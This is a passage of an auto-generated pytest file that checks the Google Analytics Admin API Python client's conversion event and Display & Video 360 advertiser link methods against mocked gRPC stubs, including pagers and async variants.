    """Async variant of the routing-header propagation check."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.DeleteConversionEventRequest()

    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_conversion_event), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        await client.delete_conversion_event(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
_, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_conversion_event_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.delete_conversion_event(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_conversion_event_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_conversion_event( analytics_admin.DeleteConversionEventRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_conversion_event_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.delete_conversion_event(name="name_value",) # Establish that the underlying call was made with the expected # request object values. 
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].name == "name_value"


@pytest.mark.asyncio
async def test_delete_conversion_event_flattened_error_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.delete_conversion_event(
            analytics_admin.DeleteConversionEventRequest(), name="name_value",
        )


def test_list_conversion_events(
    transport: str = "grpc", request_type=analytics_admin.ListConversionEventsRequest
):
    """ListConversionEvents wraps the RPC response in a pager with a page token."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_conversion_events), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = analytics_admin.ListConversionEventsResponse(
            next_page_token="next_page_token_value",
        )
        response = client.list_conversion_events(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListConversionEventsRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListConversionEventsPager)
    assert response.next_page_token == "next_page_token_value"


def test_list_conversion_events_from_dict():
    # Re-run the request-object test above with the request supplied as a dict.
    test_list_conversion_events(request_type=dict)


def test_list_conversion_events_empty_call():
    """Verify a call with no request and no flattened fields sends a default request."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_conversion_events), "__call__"
    ) as call:
        client.list_conversion_events()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListConversionEventsRequest()


@pytest.mark.asyncio
async def test_list_conversion_events_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.ListConversionEventsRequest,
):
    """Async variant: the response must be wrapped in the async pager."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_conversion_events), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.ListConversionEventsResponse(
                next_page_token="next_page_token_value",
            )
        )
        response = await client.list_conversion_events(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListConversionEventsRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListConversionEventsAsyncPager)
    assert response.next_page_token == "next_page_token_value"


@pytest.mark.asyncio
async def test_list_conversion_events_async_from_dict():
    await test_list_conversion_events_async(request_type=dict)


def test_list_conversion_events_field_headers():
    """The parent resource must be echoed in the x-goog-request-params metadata."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.ListConversionEventsRequest()

    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_conversion_events), "__call__"
    ) as call:
        call.return_value = analytics_admin.ListConversionEventsResponse()
        client.list_conversion_events(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_list_conversion_events_field_headers_async():
    """Async variant of the routing-header propagation check."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.ListConversionEventsRequest()

    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_conversion_events), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.ListConversionEventsResponse()
        )
        await client.list_conversion_events(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


def test_list_conversion_events_flattened():
    """Flattened keyword arguments must be folded into the request object."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_conversion_events), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = analytics_admin.ListConversionEventsResponse()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.list_conversion_events(parent="parent_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == "parent_value"


def test_list_conversion_events_flattened_error():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.list_conversion_events(
            analytics_admin.ListConversionEventsRequest(), parent="parent_value",
        )


@pytest.mark.asyncio
async def test_list_conversion_events_flattened_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_conversion_events), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
call.return_value = analytics_admin.ListConversionEventsResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListConversionEventsResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_conversion_events(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_conversion_events_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.list_conversion_events( analytics_admin.ListConversionEventsRequest(), parent="parent_value", ) def test_list_conversion_events_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_conversion_events), "__call__" ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListConversionEventsResponse( conversion_events=[ resources.ConversionEvent(), resources.ConversionEvent(), resources.ConversionEvent(), ], next_page_token="abc", ), analytics_admin.ListConversionEventsResponse( conversion_events=[], next_page_token="def", ), analytics_admin.ListConversionEventsResponse( conversion_events=[resources.ConversionEvent(),], next_page_token="ghi", ), analytics_admin.ListConversionEventsResponse( conversion_events=[ resources.ConversionEvent(), resources.ConversionEvent(), ], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_conversion_events(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.ConversionEvent) for i in results) def test_list_conversion_events_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_conversion_events), "__call__" ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListConversionEventsResponse( conversion_events=[ resources.ConversionEvent(), resources.ConversionEvent(), resources.ConversionEvent(), ], next_page_token="abc", ), analytics_admin.ListConversionEventsResponse( conversion_events=[], next_page_token="def", ), analytics_admin.ListConversionEventsResponse( conversion_events=[resources.ConversionEvent(),], next_page_token="ghi", ), analytics_admin.ListConversionEventsResponse( conversion_events=[ resources.ConversionEvent(), resources.ConversionEvent(), ], ), RuntimeError, ) pages = list(client.list_conversion_events(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_conversion_events_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_conversion_events), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListConversionEventsResponse( conversion_events=[ resources.ConversionEvent(), resources.ConversionEvent(), resources.ConversionEvent(), ], next_page_token="abc", ), analytics_admin.ListConversionEventsResponse( conversion_events=[], next_page_token="def", ), analytics_admin.ListConversionEventsResponse( conversion_events=[resources.ConversionEvent(),], next_page_token="ghi", ), analytics_admin.ListConversionEventsResponse( conversion_events=[ resources.ConversionEvent(), resources.ConversionEvent(), ], ), RuntimeError, ) async_pager = await client.list_conversion_events(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.ConversionEvent) for i in responses) @pytest.mark.asyncio async def test_list_conversion_events_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_conversion_events), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
        call.side_effect = (
            analytics_admin.ListConversionEventsResponse(
                conversion_events=[
                    resources.ConversionEvent(),
                    resources.ConversionEvent(),
                    resources.ConversionEvent(),
                ],
                next_page_token="abc",
            ),
            analytics_admin.ListConversionEventsResponse(
                conversion_events=[], next_page_token="def",
            ),
            analytics_admin.ListConversionEventsResponse(
                conversion_events=[resources.ConversionEvent(),], next_page_token="ghi",
            ),
            analytics_admin.ListConversionEventsResponse(
                conversion_events=[
                    resources.ConversionEvent(),
                    resources.ConversionEvent(),
                ],
            ),
            RuntimeError,
        )
        pages = []
        async for page_ in (await client.list_conversion_events(request={})).pages:
            pages.append(page_)
        for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
            assert page_.raw_page.next_page_token == token


def test_get_display_video360_advertiser_link(
    transport: str = "grpc",
    request_type=analytics_admin.GetDisplayVideo360AdvertiserLinkRequest,
):
    """GetDisplayVideo360AdvertiserLink returns the link resource's fields."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_display_video360_advertiser_link), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.DisplayVideo360AdvertiserLink(
            name="name_value",
            advertiser_id="advertiser_id_value",
            advertiser_display_name="advertiser_display_name_value",
        )
        response = client.get_display_video360_advertiser_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.GetDisplayVideo360AdvertiserLinkRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.DisplayVideo360AdvertiserLink)
    assert response.name == "name_value"
    assert response.advertiser_id == "advertiser_id_value"
    assert response.advertiser_display_name == "advertiser_display_name_value"


def test_get_display_video360_advertiser_link_from_dict():
    # Re-run the request-object test above with the request supplied as a dict.
    test_get_display_video360_advertiser_link(request_type=dict)


def test_get_display_video360_advertiser_link_empty_call():
    """Verify a call with no request and no flattened fields sends a default request."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_display_video360_advertiser_link), "__call__"
    ) as call:
        client.get_display_video360_advertiser_link()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.GetDisplayVideo360AdvertiserLinkRequest()


@pytest.mark.asyncio
async def test_get_display_video360_advertiser_link_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.GetDisplayVideo360AdvertiserLinkRequest,
):
    """Async variant: fake the unary-unary stub and check the decoded response."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_display_video360_advertiser_link), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.DisplayVideo360AdvertiserLink(
                name="name_value",
                advertiser_id="advertiser_id_value",
                advertiser_display_name="advertiser_display_name_value",
            )
        )
        response = await client.get_display_video360_advertiser_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.GetDisplayVideo360AdvertiserLinkRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.DisplayVideo360AdvertiserLink)
    assert response.name == "name_value"
    assert response.advertiser_id == "advertiser_id_value"
    assert response.advertiser_display_name == "advertiser_display_name_value"


@pytest.mark.asyncio
async def test_get_display_video360_advertiser_link_async_from_dict():
    await test_get_display_video360_advertiser_link_async(request_type=dict)


def test_get_display_video360_advertiser_link_field_headers():
    """The resource name must be echoed in the x-goog-request-params metadata."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.GetDisplayVideo360AdvertiserLinkRequest()

    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_display_video360_advertiser_link), "__call__"
    ) as call:
        call.return_value = resources.DisplayVideo360AdvertiserLink()
        client.get_display_video360_advertiser_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_get_display_video360_advertiser_link_field_headers_async():
    """Async variant of the routing-header propagation check."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.GetDisplayVideo360AdvertiserLinkRequest()

    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_display_video360_advertiser_link), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.DisplayVideo360AdvertiserLink()
        )
        await client.get_display_video360_advertiser_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


def test_get_display_video360_advertiser_link_flattened():
    """Flattened keyword arguments must be folded into the request object."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_display_video360_advertiser_link), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.DisplayVideo360AdvertiserLink()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.get_display_video360_advertiser_link(name="name_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_display_video360_advertiser_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_display_video360_advertiser_link( analytics_admin.GetDisplayVideo360AdvertiserLinkRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_display_video360_advertiser_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLink() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLink() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_display_video360_advertiser_link(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_display_video360_advertiser_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
    with pytest.raises(ValueError):
        await client.get_display_video360_advertiser_link(
            analytics_admin.GetDisplayVideo360AdvertiserLinkRequest(),
            name="name_value",
        )


def test_list_display_video360_advertiser_links(
    transport: str = "grpc",
    request_type=analytics_admin.ListDisplayVideo360AdvertiserLinksRequest,
):
    """ListDisplayVideo360AdvertiserLinks wraps the RPC response in a pager."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_display_video360_advertiser_links), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = analytics_admin.ListDisplayVideo360AdvertiserLinksResponse(
            next_page_token="next_page_token_value",
        )
        response = client.list_display_video360_advertiser_links(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListDisplayVideo360AdvertiserLinksRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListDisplayVideo360AdvertiserLinksPager)
    assert response.next_page_token == "next_page_token_value"


def test_list_display_video360_advertiser_links_from_dict():
    # Re-run the request-object test above with the request supplied as a dict.
    test_list_display_video360_advertiser_links(request_type=dict)


def test_list_display_video360_advertiser_links_empty_call():
    """Verify a call with no request and no flattened fields sends a default request."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_display_video360_advertiser_links), "__call__"
    ) as call:
        client.list_display_video360_advertiser_links()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListDisplayVideo360AdvertiserLinksRequest()


@pytest.mark.asyncio
async def test_list_display_video360_advertiser_links_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.ListDisplayVideo360AdvertiserLinksRequest,
):
    """Async variant: the response must be wrapped in the async pager."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_display_video360_advertiser_links), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.ListDisplayVideo360AdvertiserLinksResponse(
                next_page_token="next_page_token_value",
            )
        )
        response = await client.list_display_video360_advertiser_links(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListDisplayVideo360AdvertiserLinksRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListDisplayVideo360AdvertiserLinksAsyncPager)
    assert response.next_page_token == "next_page_token_value"


@pytest.mark.asyncio
async def test_list_display_video360_advertiser_links_async_from_dict():
    await test_list_display_video360_advertiser_links_async(request_type=dict)


def test_list_display_video360_advertiser_links_field_headers():
    """The parent resource must be echoed in the x-goog-request-params metadata."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.ListDisplayVideo360AdvertiserLinksRequest()

    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_display_video360_advertiser_links), "__call__"
    ) as call:
        call.return_value = analytics_admin.ListDisplayVideo360AdvertiserLinksResponse()
        client.list_display_video360_advertiser_links(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_list_display_video360_advertiser_links_field_headers_async():
    """Async variant of the routing-header propagation check."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.ListDisplayVideo360AdvertiserLinksRequest()

    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object( type(client.transport.list_display_video360_advertiser_links), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListDisplayVideo360AdvertiserLinksResponse() ) await client.list_display_video360_advertiser_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_display_video360_advertiser_links_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListDisplayVideo360AdvertiserLinksResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_display_video360_advertiser_links(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_display_video360_advertiser_links_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): client.list_display_video360_advertiser_links( analytics_admin.ListDisplayVideo360AdvertiserLinksRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_display_video360_advertiser_links_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListDisplayVideo360AdvertiserLinksResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListDisplayVideo360AdvertiserLinksResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_display_video360_advertiser_links( parent="parent_value", ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_display_video360_advertiser_links_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.list_display_video360_advertiser_links( analytics_admin.ListDisplayVideo360AdvertiserLinksRequest(), parent="parent_value", ) def test_list_display_video360_advertiser_links_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_links), "__call__" ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), ], next_page_token="abc", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[], next_page_token="def", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), ], next_page_token="ghi", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), ], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_display_video360_advertiser_links(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all( isinstance(i, resources.DisplayVideo360AdvertiserLink) for i in results ) def test_list_display_video360_advertiser_links_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_links), "__call__" ) as call: # Set the response to a series of pages. 
